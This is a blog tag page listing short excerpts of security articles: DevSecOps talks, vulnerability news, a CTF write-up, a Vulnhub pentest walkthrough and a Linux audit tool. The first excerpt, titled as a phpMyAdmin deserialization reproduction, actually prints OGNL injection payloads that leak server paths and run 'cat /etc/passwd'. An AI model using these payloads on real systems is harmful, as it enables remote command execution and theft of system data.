Tag:Security vulnerabilities
-
phpmyadmin scripts/setup. Recurrence of PHP deserialization vulnerability
First enter in the password field%{1+1} It is found that it resolves to 2, indicating that the vulnerability exists Enter% {“tomcatbindir {” + @ Java. Lang [email protected] (“user. Dir”) + “}”} get the Tomcat execution path Get web path %{ #[email protected]@getRequest(), #response=#context.get(“com.opensymphony.xwork2.dispatcher.HttpServletResponse”).getWriter(), #response.println(#req.getRealPath(‘/’)), #response.flush(), #response.close() } Execute cat / etc / passwd %{ #a=(new java.lang.ProcessBuilder(new java.lang.String[]{“cat”,”/etc/passwd”})).redirectErrorStream(true).start(), #b=#a.getInputStream(), […]
-
Devsecops: a security software construction model for happy
The article was first published in:Firewire Zone Cloud Security Community Author: Ma Jinghe How to use devsecops, which sounds very long and difficult to practice, to help you build security software happily. My name is brother ma. At present, I am working as a Devops technical preacher in Jihu gitlab to share my experience with […]
-
The DVWA file contains a vulnerability
The file contains: when the server turns on allow_ url_ When the include option is selected, you can use some feature functions, such as: include(), require(), include_ once() , require_ Once () uses the URL to dynamically include files. If the source of the file is not reviewed, it will lead to arbitrary file reading […]
-
Buuctf reinforcement question ezsql
Title reappearance I did this problem three months ago, but I didn’t get the flag at that time. After other big guys did it, I hurried to learn and record a wave. The conditions and requirements of the topic are very clear: the web service has loopholes and needs to be reinforced. If the reinforcement […]
-
Penetration test jangow1 0.1 — entry level
Penetration test jangow101 (I) 1、 Environment construction 1. Target: IP: 192.168.0.9 Target download: https://download.vulnhub.com/jangow/jangow-01-1.0.1.ova 2. Attacker: IP: 192.168.0.11 3. How to build Right click to open the downloaded file directly, and select VirtualBox (mind using VirtualBox) After opening with VirtualBox, the target IP will be displayed 2、 Information collection 1. Nmap scan open port nmap […]
-
Latest version: Apache pulsar solution for log4j vulnerability
Author: Matteo Merli, streamnative CTO, chairman of Apache pulsar PMC; Addison Higham, engineer in charge of streamnative, Apache pulsar Committee. This article is translated from streamnational English blog. The original link is:https://streamnative.io/blog/…For more details, please refer to the official account of StreamNative. This article was updated on Tuesday, adding details on how the latest log4j […]
-
GitHub actions is exposed to serious security vulnerabilities, and Google Project Zero discloses details
For developers, creating a project on GitHub for operation does not mean that the project has been really completed. There are still a lot of deployment and testing work to be done manually. GitHub’s action function can simplify this step and automatically test the project code. Now many people have used it for continuous integration […]
-
After discovering the loopholes of network products, the upstream developers shall be notified immediately and the downstream users shall be notified in time
[regulations on the management of network product security vulnerabilities · Article 7] Network product providers shall perform the following network product security vulnerability management obligations, ensure that their product security vulnerabilities are timely repaired and reasonably released, and guide and support product users to take preventive measures: (1) After discovering or learning that there are […]
-
Apple has officially launched a new vulnerability submission reward plan, with a bonus of up to $1.5 million
Recently, apple, an international mobile phone manufacturer, officially launched its latest vulnerability submission reward plan for developers in all security fields. Apple raised the bonus ceiling from $200000 to $1.5 million. The specific bonus will be determined according to the complexity and severity of the vulnerability exploitation chain. Ivan krsti, head of security engineering and […]
-
Problems related to cdh5 installation
Cdh5 related install installmanager wget http://archive.cloudera.com/cm5/installer/latest/cloudera-manager-installer.bin chmod +x cloudera-manager-installer.bin ./cloudera-manager-installer.bin Modify environment variables [[email protected] ~]# vim /etc/sysconfig/network [[email protected] ~]# vim /etc/hosts [[email protected] ~]# vim /etc/sysconfig/network [[email protected] ~]# hostname cdh5datanode1 cat /proc/version Mirror source cd /Users/timger/qiniusharedir/cdh5 wget -U “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5)” -r -p -k -nc -o down.log http://archive-primary.cloudera.com/cdh5/parcels/latest/ wget -U “Mozilla/4.0 […]
-
Automatic security audit tool for Linux server
Lynis is UNIX/LinuxAnd so on operating system security audit tool, it can discover based onLinux systemMalware and security vulnerabilities in. Lynis is a free and open source server audit tool. Once the audit is completed, we can review the results, warnings and suggestions, and then we can implement our security policy based on it. It […]
-
Zhou Jihai: practice from Devops to devosecops
On September 25 and 26, 2020, GOPs global operation and Maintenance Conference (Shenzhen station) was successfully held. At this conference, top experts from Tencent, Alibaba, Jingdong and Ping’an spread advanced technology ideas and ideas and shared best practices in the industry for Internet and traditional industries, as well as the majority of operation and maintenance […]